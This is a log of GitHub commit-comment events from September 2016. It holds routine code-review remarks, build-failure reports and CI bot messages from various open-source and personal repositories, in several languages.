{"id":"4566423048","type":"CommitCommentEvent","actor":{"login":"dustin"},"repo":{"name":"mlyle/dronin"},"payload":{"comment":{"id":19031384,"position":21,"line":484,"path":"flight/Modules/CharacterOSD/panel.c","commit_id":"74cb87cc21ddf7399b9149f6e2268ad486b87c86","created_at":"2016-09-15T07:01:12Z","updated_at":"2016-09-15T07:01:12Z","body":"Yeah, I've got ideas for how to do this a good deal better.  Concept is\nworking, though.\n\nOn Wed, Sep 14, 2016, 23:28 Michael Lyle <notifications@github.com> wrote:\n\n> can we test for the existence of the uavos for this stuff? For battery--\n> for sure. Maybe gpsposition gets inited anyways, but at least we could use\n> the same has_nav test as the main osd.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mlyle/dronin/commit/74cb87cc21ddf7399b9149f6e2268ad486b87c86#commitcomment-19031158>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAG87a_cmKTTbY7h3oSZ4YcHl5kOd4Cks5qqOWagaJpZM4J9iaa>\n> .\n>\n"}},"created_at":"2016-09-15T07:01:12Z"}
{"id":"4566429564","type":"CommitCommentEvent","actor":{"login":"krichprollsch"},"repo":{"name":"clermontech/Introducing-APIHours"},"payload":{"comment":{"id":19031398,"position":50,"line":87,"path":"introducing-apihours.md","commit_id":"13f5840a38476ab6ca34ae3bfa947737067b7a7d","created_at":"2016-09-15T07:03:10Z","updated_at":"2016-09-15T07:03:10Z","body":"Bonne idée, @lunika c'est faisable ? tu as les accès je crois"}},"created_at":"2016-09-15T07:03:10Z"}
{"id":"4566432369","type":"CommitCommentEvent","actor":{"login":"mariusju"},"repo":{"name":"mariusju/react-redux-templates-playground"},"payload":{"comment":{"id":19031407,"position":4,"line":10,"path":"package.json","commit_id":"7af702b8f5cf90c71d4073a69fc80b0766f71820","created_at":"2016-09-15T07:04:00Z","updated_at":"2016-09-15T07:04:00Z","body":"reviewing "}},"created_at":"2016-09-15T07:04:00Z"}
{"id":"4566435313","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19031421,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-15T07:04:55Z","updated_at":"2016-09-15T07:04:55Z","body":"What about sound and network? Those packages seem to be missing. Add them with every profile?"}},"created_at":"2016-09-15T07:04:55Z"}
{"id":"4566437050","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":19031425,"position":null,"line":null,"path":null,"commit_id":"90f42981f00a6fbfb3419b7db4d99acd947c1523","created_at":"2016-09-15T07:05:30Z","updated_at":"2016-09-15T07:05:30Z","body":"Ah, great, I see it now. Cool how the doc is just a link to the feature spec, and it actually works because the spec is written clearly enough :thumbsup: "}},"created_at":"2016-09-15T07:05:30Z"}
{"id":"4566437538","type":"CommitCommentEvent","actor":{"login":"jvandijk"},"repo":{"name":"Sensimity/com.sensimity.ti.client"},"payload":{"comment":{"id":19031427,"position":null,"line":null,"path":null,"commit_id":"6a98be7dd072864a5a29f2c146c65f1989ac7a17","created_at":"2016-09-15T07:05:40Z","updated_at":"2016-09-15T07:05:40Z","body":"Did you try to run under 5.2.2 as well then?"}},"created_at":"2016-09-15T07:05:40Z"}
{"id":"4566441782","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19031448,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T07:06:49Z","updated_at":"2016-09-15T07:06:49Z","body":"Со старыми дебаффами пока не решил что делать. По идее, как обычно, удалить, и закинуть на форум конфиг. Но чет жалко)"}},"created_at":"2016-09-15T07:06:49Z"}
{"id":"4566445753","type":"CommitCommentEvent","actor":{"login":"ypid"},"repo":{"name":"debops/ansible-console"},"payload":{"comment":{"id":19031455,"position":3,"line":3,"path":"templates/etc/systemd/system/systemd-logind.service.d/hidepid.conf.j2","commit_id":"01afad3cbe59a637bed7aeef65ab0f258ac8b079","created_at":"2016-09-15T07:08:06Z","updated_at":"2016-09-15T07:08:06Z","body":"Hehe. Somebody deleted something on the Internet. @le9i0nx Want to remove the comment so that we don’t forget about it?"}},"created_at":"2016-09-15T07:08:06Z"}
{"id":"4566447351","type":"CommitCommentEvent","actor":{"login":"otakup0pe"},"repo":{"name":"inferiorhumanorgans/aomi"},"payload":{"comment":{"id":19031457,"position":null,"line":null,"path":null,"commit_id":"8e8cff2568e288d350042cb774b5d5289f0eb72f","created_at":"2016-09-15T07:08:36Z","updated_at":"2016-09-15T07:08:36Z","body":"It does now yo https://github.com/ianunruh/hvac/pull/77"}},"created_at":"2016-09-15T07:08:36Z"}
{"id":"4566449111","type":"CommitCommentEvent","actor":{"login":"otakup0pe"},"repo":{"name":"inferiorhumanorgans/aomi"},"payload":{"comment":{"id":19031460,"position":null,"line":null,"path":null,"commit_id":"9932b8eda09d0201e30bdfd70ac7ed3ac392047a","created_at":"2016-09-15T07:09:10Z","updated_at":"2016-09-15T07:09:10Z","body":":shipit: "}},"created_at":"2016-09-15T07:09:10Z"}
{"id":"4566450535","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19031464,"position":null,"line":null,"path":null,"commit_id":"c1070935819eaeaafce99c6cdf1340b6fc090417","created_at":"2016-09-15T07:09:37Z","updated_at":"2016-09-15T07:09:37Z","body":"Bug of git i guess"}},"created_at":"2016-09-15T07:09:37Z"}
{"id":"4566452335","type":"CommitCommentEvent","actor":{"login":"condensor"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19031467,"position":null,"line":null,"path":null,"commit_id":"3bf4a41ae6c459753cc5486d514d111723c33758","created_at":"2016-09-15T07:10:14Z","updated_at":"2016-09-15T07:10:14Z","body":"thx u bro"}},"created_at":"2016-09-15T07:10:14Z"}
{"id":"4566452760","type":"CommitCommentEvent","actor":{"login":"magicismight"},"repo":{"name":"react-native-community/react-native-svg"},"payload":{"comment":{"id":19031469,"position":null,"line":null,"path":null,"commit_id":"3d4974942a46daa36d0a436cb2010aa158c4995e","created_at":"2016-09-15T07:10:21Z","updated_at":"2016-09-15T07:10:21Z","body":"I have moved the independent example to a new repo:\r\nhttps://github.com/magicismight/react-native-svg-example"}},"created_at":"2016-09-15T07:10:21Z"}
{"id":"4566458412","type":"CommitCommentEvent","actor":{"login":"jackyphuong"},"repo":{"name":"jackyphuong/coretracking"},"payload":{"comment":{"id":19031487,"position":null,"line":null,"path":null,"commit_id":"487cb1e2fa4b1766845451ef9b5a49cb9a662958","created_at":"2016-09-15T07:12:14Z","updated_at":"2016-09-15T07:12:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;JSJVGe0s&#x2F;3-integrate-a-gird-component-to-project\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Integrate a gird component to project</a>"}},"created_at":"2016-09-15T07:12:14Z"}
{"id":"4566458470","type":"CommitCommentEvent","actor":{"login":"taimir"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19031488,"position":24,"line":221,"path":"pkg/kubeadm/cmd/manual.go","commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-15T07:12:15Z","updated_at":"2016-09-15T07:12:15Z","body":"Since the `manual` bootstrap also calls the `PerformTLSBootstrap` method from `csr.go`, the flag passed to manual should propagate to the `s.Secrets.BearerToken` (as that's the one used in the method)."}},"created_at":"2016-09-15T07:12:15Z"}
{"id":"4566460555","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19031496,"position":null,"line":null,"path":null,"commit_id":"853982be4330f597648e4ed1e44c8742220f61c8","created_at":"2016-09-15T07:12:54Z","updated_at":"2016-09-15T07:12:54Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35428/testReport/) for this commit**"}},"created_at":"2016-09-15T07:12:54Z"}
{"id":"4566465546","type":"CommitCommentEvent","actor":{"login":"hengsoheak"},"repo":{"name":"Crinsane/LaravelShoppingcart"},"payload":{"comment":{"id":19031504,"position":null,"line":null,"path":null,"commit_id":"95b46c59dd4060d741466cf3b4d677887cc3daeb","created_at":"2016-09-15T07:14:31Z","updated_at":"2016-09-15T07:14:31Z","body":"Is it compatible with Laravel5.3?\r\nHowever I'm fresh new in Laravel and I don't how to call you cart packages to my controller."}},"created_at":"2016-09-15T07:14:31Z"}
{"id":"4566476624","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":19031527,"position":12,"line":33,"path":"NEAT_Visualizer/Views/MainWindow.xaml.cs","commit_id":"5aedc1eda89445ff5184baf2933c20957fb276c5","created_at":"2016-09-15T07:18:02Z","updated_at":"2016-09-15T07:18:02Z","body":"`FindControl<NeuralNetworkVisualizer>(\"Canvas\")` should make this line work "}},"created_at":"2016-09-15T07:18:02Z"}
{"id":"4566482486","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19031540,"position":5,"line":83,"path":"views/layout.html","commit_id":"7fbddbc48bcc71b84eec9be67f465e19b9b0c585","created_at":"2016-09-15T07:19:50Z","updated_at":"2016-09-15T07:19:50Z","body":"Ça reste à expliciter, oui.\r\nEn général, quand je parle de la commande, je mets `ezmaster`, mais quand je parle de l'application en général je mets `ezMaster`, mais la différence est petite."}},"created_at":"2016-09-15T07:19:50Z"}
{"id":"4566484175","type":"CommitCommentEvent","actor":{"login":"YoshiteruIwasaki"},"repo":{"name":"aipocom/aipo"},"payload":{"comment":{"id":19031544,"position":5,"line":52,"path":"war/src/main/webapp/javascript/aipo/widget/MemberNormalSelectList.js","commit_id":"4e4fdfae79a687d889e3cec0a5da89b94e75fa35","created_at":"2016-09-15T07:20:22Z","updated_at":"2016-09-15T07:20:22Z","body":"可能であれば\r\n\r\nhttps://github.com/aipocom/aipo/blob/bece30732b56b5f24e98427d2bf21d20a08681dd/war/src/main/webapp/javascript/aipo/aipo.js#L281-L284\r\n\r\nのようにして\r\niPhone OS 9 or iPhone OS 10\r\nのケースを使いまわせるようにしておくとよさそうです。\r\n"}},"created_at":"2016-09-15T07:20:22Z"}
{"id":"4566487449","type":"CommitCommentEvent","actor":{"login":"rdengate"},"repo":{"name":"TerriaJS/terriajs"},"payload":{"comment":{"id":19031556,"position":46,"line":594,"path":"lib/Models/WebProcessingServiceCatalogFunction.js","commit_id":"a1a9265f57299eff87d80e162d0dcc27caeddb40","created_at":"2016-09-15T07:21:21Z","updated_at":"2016-09-15T07:21:21Z","body":"No, it's also claiming to be v1.0."}},"created_at":"2016-09-15T07:21:21Z"}
{"id":"4566487922","type":"CommitCommentEvent","actor":{"login":"koivo"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19031557,"position":null,"line":null,"path":null,"commit_id":"ab921e392bd06cd1fa8be04fcb192f89e6cb82d0","created_at":"2016-09-15T07:21:31Z","updated_at":"2016-09-15T07:21:31Z","body":"Yes, this commit breaks the build.\r\n\r\nCollected errors:\r\n * preinst_configure: Aborting installation of ndisc6-rdnssd.\r\n * opkg_install: Cannot install package openhdf-base."}},"created_at":"2016-09-15T07:21:31Z"}
{"id":"4566488588","type":"CommitCommentEvent","actor":{"login":"RyTekk"},"repo":{"name":"olivieer/android_kernel_sony_msm8994"},"payload":{"comment":{"id":19031561,"position":null,"line":null,"path":null,"commit_id":"4665bfc0c2f9e31d7b17956878ee2a3c6c6fdb92","created_at":"2016-09-15T07:21:43Z","updated_at":"2016-09-15T07:21:43Z","body":"I solved it, ramdisk seems to mess it up, but now I get the same issue with bluetooth and MHL driver, maybe they're not compatible with Z5? You seem to be using Z3+."}},"created_at":"2016-09-15T07:21:43Z"}
{"id":"4566491670","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19031569,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T07:22:39Z","updated_at":"2016-09-15T07:22:39Z","body":"@avigad:\r\n\r\n> I'd read the example as \"obtain a, b, and c, and use it in the expression...\"\r\n\r\nBut you conveniently left out the source from which you obtained a, b, and c. ;) Presumably, you obtained it _from_ p1.\r\n\r\n@leodemoura:\r\n\r\n> The `:=` is replacing the `, from` in the original one, and the `in` is replacing the `,`.\r\n> That is, we are not replacing `, from` with `in`\r\n\r\nIt's clear from the thread that that is what you meant. But my concern is how one would intuitively “read” or “speak” the construction. When I read `let x := y in z`, it comes out as “let x equal y in z.” When I first read `obtain x := y in z`, I didn't know how to construct a meaningful English statement using the words “obtain” and “in”, which are explicit. I would not intuitively use “from” for `:=`.\r\n\r\n(Just to be clear, I'm not arguing in favor of the `let` syntax. I understand what you don't want to use that. Rather, I find the `obtain ... := ... in ...` syntax unintuitive.)\r\n\r\nAs a thought experiment, is there a reason you couldn't use the syntax `obtain ... from ... for ...` or, if you don't want to add the keyword `for`, `obtain ... from ... in ...`?"}},"created_at":"2016-09-15T07:22:39Z"}
{"id":"4566493912","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031576,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T07:23:20Z","updated_at":"2016-09-15T07:23:20Z","body":"versionNumbers (mitchute) - i386-Windows-7-VisualStudio-12: OK (2335 of 2335 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T07:23:20Z"}
{"id":"4566496506","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031578,"position":2,"line":2,"path":"local/templates/.default/components/bitrix/news.list/experts/result_modifier.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:24:11Z","updated_at":"2016-09-15T07:24:11Z","body":"Отформатируй код."}},"created_at":"2016-09-15T07:24:11Z"}
{"id":"4566497642","type":"CommitCommentEvent","actor":{"login":"taimir"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19031580,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-15T07:24:31Z","updated_at":"2016-09-15T07:24:31Z","body":"@lukemarsden Hi, I've been testing out the new `kubeadm` provisioning for the last day and a half (also been following the `sig-cluster-lifecycle` work for a while). I really like it so far! Is there an established way of how I could contribute to the project? I'd like to help you guys out.\r\n\r\nI managed to set up an operational cluster yesterday (2 Ubuntu Xenial nodes), but I had to introduce the changes in this commit for it to work:\r\n\r\n* I had to bump the k8s version to `1.4.0-beta.3`, as the manual node bootstrap complained that the certificate signing is not supported in earlier versions\r\n* There was a small bug in the code of how the Bearer token is passed in the manual bootstrap of a node (see above)\r\n* I often use flannel as a pod overlay, but here it did not work because the Cluster CIDR on the controller was not defined properly. Also, for some reason the Services CIDR was being passed as a Cluster CIDR ... which shouldn't be, right? I changed this behavior here.\r\n\r\nIf you find those changes useful, I'd be glad to get them merged :)\r\n\r\nP.S: for some reason github does not let me create a pull request to your fork ..."}},"created_at":"2016-09-15T07:24:31Z"}
{"id":"4566497691","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031581,"position":9,"line":9,"path":"local/templates/.default/components/bitrix/news.list/experts/result_modifier.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:24:32Z","updated_at":"2016-09-15T07:24:32Z","body":"Тут правильнее !empty"}},"created_at":"2016-09-15T07:24:32Z"}
{"id":"4566498861","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031585,"position":2,"line":2,"path":"local/templates/.default/components/bitrix/news.list/experts/template.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:24:53Z","updated_at":"2016-09-15T07:24:53Z","body":"Отформатируй код"}},"created_at":"2016-09-15T07:24:53Z"}
{"id":"4566500544","type":"CommitCommentEvent","actor":{"login":"mapfau"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19031588,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-15T07:25:22Z","updated_at":"2016-09-15T07:25:22Z","body":"will look at the us amazon issue"}},"created_at":"2016-09-15T07:25:22Z"}
{"id":"4566502449","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":19031591,"position":1,"line":1,"path":"To Anil","commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-15T07:25:54Z","updated_at":"2016-09-15T07:25:54Z","body":"[CROSSWORD PUZZLE.zip](https://github.com/anilhdas/Peak_ARG/files/474038/CROSSWORD.PUZZLE.zip)\r\n"}},"created_at":"2016-09-15T07:25:54Z"}
{"id":"4566503144","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031593,"position":16,"line":16,"path":"local/templates/.default/components/bitrix/news.list/experts/template.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:26:07Z","updated_at":"2016-09-15T07:26:07Z","body":"; в таких блоках не нужны (как и пробелы до и после фрагмента кода)"}},"created_at":"2016-09-15T07:26:07Z"}
{"id":"4566504220","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031596,"position":26,"line":26,"path":"local/templates/.default/components/bitrix/news.list/experts/template.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:26:26Z","updated_at":"2016-09-15T07:26:26Z","body":"Здесь тоже не нужна ;"}},"created_at":"2016-09-15T07:26:26Z"}
{"id":"4566505114","type":"CommitCommentEvent","actor":{"login":"soumikdas"},"repo":{"name":"anilhdas/Peak_ARG"},"payload":{"comment":{"id":19031598,"position":1,"line":1,"path":"To Anil","commit_id":"47c7ee383ff66bf23a23b43f2c04eba78baa4b90","created_at":"2016-09-15T07:26:42Z","updated_at":"2016-09-15T07:26:42Z","body":"Please check and revert"}},"created_at":"2016-09-15T07:26:42Z"}
{"id":"4566505733","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031601,"position":25,"line":23,"path":"partial/index/about-block.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:26:53Z","updated_at":"2016-09-15T07:26:53Z","body":"array должен быть в нижнем регистре"}},"created_at":"2016-09-15T07:26:53Z"}
{"id":"4566506351","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031603,"position":26,"line":24,"path":"partial/index/about-block.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:27:03Z","updated_at":"2016-09-15T07:27:03Z","body":"Кавычки одинарные"}},"created_at":"2016-09-15T07:27:03Z"}
{"id":"4566507150","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031604,"position":95,"line":32,"path":"partial/index/about-block.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:27:16Z","updated_at":"2016-09-15T07:27:16Z","body":"Здесь аналогично"}},"created_at":"2016-09-15T07:27:16Z"}
{"id":"4566507730","type":"CommitCommentEvent","actor":{"login":"liberty-developer"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19031607,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-15T07:27:27Z","updated_at":"2016-09-15T07:27:27Z","body":"I got some information about the amazon u.s. issue and will look over it."}},"created_at":"2016-09-15T07:27:27Z"}
{"id":"4566507793","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031608,"position":109,"line":46,"path":"partial/index/about-block.php","commit_id":"779bd2df1ffda98467d6b05a3c191944d4090469","created_at":"2016-09-15T07:27:28Z","updated_at":"2016-09-15T07:27:28Z","body":"id выносим в конфиг"}},"created_at":"2016-09-15T07:27:28Z"}
{"id":"4566509104","type":"CommitCommentEvent","actor":{"login":"peace-4-you"},"repo":{"name":"peace-4-you/TI2206-2016-2017"},"payload":{"comment":{"id":19031613,"position":4,"line":138,"path":"bust-a-move-framework/src/main/java/nl/tudelft/bust_a_move20162017/bust_a_move_framework/game/Game.java","commit_id":"b9cf8f24757cddfeed9add5cc785328a8c7bc524","created_at":"2016-09-15T07:27:51Z","updated_at":"2016-09-15T07:27:51Z","body":"@justino10950 @mauricewillemsen This mechanism is already built-in the landBubble() method (of Arena class). We need to discuss if we keep it here or in landBubble(). "}},"created_at":"2016-09-15T07:27:51Z"}
{"id":"4566510256","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"bladewolk/testversus"},"payload":{"comment":{"id":19031615,"position":10,"line":10,"path":"KATA #11/index.php","commit_id":"f31d885fda813c2dd5f68aea3ea40354c9825912","created_at":"2016-09-15T07:28:11Z","updated_at":"2016-09-15T07:28:11Z","body":"too many extra steps. you can add `'_'` to the end of string, if it's length is odd and then split"}},"created_at":"2016-09-15T07:28:11Z"}
{"id":"4566512755","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031620,"position":null,"line":null,"path":null,"commit_id":"672ff4b5ff052a8377f65723641630c19311ae8d","created_at":"2016-09-15T07:28:53Z","updated_at":"2016-09-15T07:28:53Z","body":"На такие коммиты нужно ставить тег refactoring"}},"created_at":"2016-09-15T07:28:53Z"}
{"id":"4566514766","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031626,"position":43,"line":10,"path":"about/index.php","commit_id":"526c92ba7c95a0ed2c03efc7cc77dbb5c71c73ea","created_at":"2016-09-15T07:29:28Z","updated_at":"2016-09-15T07:29:28Z","body":"array в нижний регистр"}},"created_at":"2016-09-15T07:29:28Z"}
{"id":"4566514935","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19031627,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-15T07:29:31Z","updated_at":"2016-09-15T07:29:31Z","body":"It's possible we could migrate to use just one but they do both have advantages I think"}},"created_at":"2016-09-15T07:29:31Z"}
{"id":"4566515713","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031628,"position":1,"line":1,"path":"local/php_interface/classes/Helpers/StringHelper.php","commit_id":"526c92ba7c95a0ed2c03efc7cc77dbb5c71c73ea","created_at":"2016-09-15T07:29:46Z","updated_at":"2016-09-15T07:29:46Z","body":"Почему без пространства имён?"}},"created_at":"2016-09-15T07:29:46Z"}
{"id":"4566516765","type":"CommitCommentEvent","actor":{"login":"Sw2rT1"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19031630,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T07:30:06Z","updated_at":"2016-09-15T07:30:06Z","body":"А че жалко то? В старые рейды только ради фана ходить, там и дебафы отслеживать уже не придется."}},"created_at":"2016-09-15T07:30:06Z"}
{"id":"4566518069","type":"CommitCommentEvent","actor":{"login":"beikov"},"repo":{"name":"Blazebit/blaze-persistence"},"payload":{"comment":{"id":19031633,"position":20,"line":125,"path":"entity-view/impl/src/main/java/com/blazebit/persistence/view/impl/CollectionJoinMappingGathererExpressionVisitor.java","commit_id":"722c4364bb7cb47483d10d1810ba8d154be103c6","created_at":"2016-09-15T07:30:25Z","updated_at":"2016-09-15T07:30:25Z","body":"What about SIZE? Have you forgotten that or is that not problematic?"}},"created_at":"2016-09-15T07:30:25Z"}
{"id":"4566522225","type":"CommitCommentEvent","actor":{"login":"peace-4-you"},"repo":{"name":"peace-4-you/TI2206-2016-2017"},"payload":{"comment":{"id":19031642,"position":null,"line":null,"path":null,"commit_id":"b9cf8f24757cddfeed9add5cc785328a8c7bc524","created_at":"2016-09-15T07:31:29Z","updated_at":"2016-09-15T07:31:29Z","body":"@justino10950 Nice work! We need to change one minor detail. See the added comment. "}},"created_at":"2016-09-15T07:31:29Z"}
{"id":"4566522659","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031645,"position":156,"line":156,"path":"local/php_interface/classes/Helpers/StringHelper.php","commit_id":"526c92ba7c95a0ed2c03efc7cc77dbb5c71c73ea","created_at":"2016-09-15T07:31:37Z","updated_at":"2016-09-15T07:31:37Z","body":"Добавь перевод строки"}},"created_at":"2016-09-15T07:31:37Z"}
{"id":"4566524338","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031648,"position":null,"line":null,"path":null,"commit_id":"c5eb1c9aa6424537748cc31ac7d5d8255877a1fb","created_at":"2016-09-15T07:32:08Z","updated_at":"2016-09-15T07:32:08Z","body":"Добавь переводы строки в конце файла"}},"created_at":"2016-09-15T07:32:08Z"}
{"id":"4566527184","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031661,"position":15,"line":133,"path":"local/php_interface/classes/Helpers/StringHelper.php","commit_id":"4e6eb2092e21c90492110da0186ea42908d5047f","created_at":"2016-09-15T07:32:55Z","updated_at":"2016-09-15T07:32:55Z","body":"Добавь пустую строку перед"}},"created_at":"2016-09-15T07:32:55Z"}
{"id":"4566527467","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031663,"position":22,"line":140,"path":"local/php_interface/classes/Helpers/StringHelper.php","commit_id":"4e6eb2092e21c90492110da0186ea42908d5047f","created_at":"2016-09-15T07:32:59Z","updated_at":"2016-09-15T07:32:59Z","body":"Добавь пустую строку перед"}},"created_at":"2016-09-15T07:32:59Z"}
{"id":"4566527480","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19031664,"position":8,"line":15,"path":"issue11/regist.php","commit_id":"71dc46a0bec5a6b5d52708d73cf7b6a2437b6224","created_at":"2016-09-15T07:32:59Z","updated_at":"2016-09-15T07:32:59Z","body":"意味不明な記載ですね！どこから来たのかもよく分かりません汗"}},"created_at":"2016-09-15T07:32:59Z"}
{"id":"4566528348","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031666,"position":16,"line":11,"path":"partial/index/about-block.php","commit_id":"4e6eb2092e21c90492110da0186ea42908d5047f","created_at":"2016-09-15T07:33:13Z","updated_at":"2016-09-15T07:33:13Z","body":"array в нижний регистр"}},"created_at":"2016-09-15T07:33:13Z"}
{"id":"4566530906","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19031679,"position":5,"line":677,"path":"pkg/api/types.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T07:33:56Z","updated_at":"2016-09-15T07:33:56Z","body":"Done. https://github.com/kubernetes/kubernetes/commit/50151eb7813e5d8402962c97bad30f2200cf2880\r\n"}},"created_at":"2016-09-15T07:33:56Z"}
{"id":"4566531678","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19031682,"position":5,"line":561,"path":"pkg/api/v1/types.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T07:34:10Z","updated_at":"2016-09-15T07:34:10Z","body":"Done. "}},"created_at":"2016-09-15T07:34:10Z"}
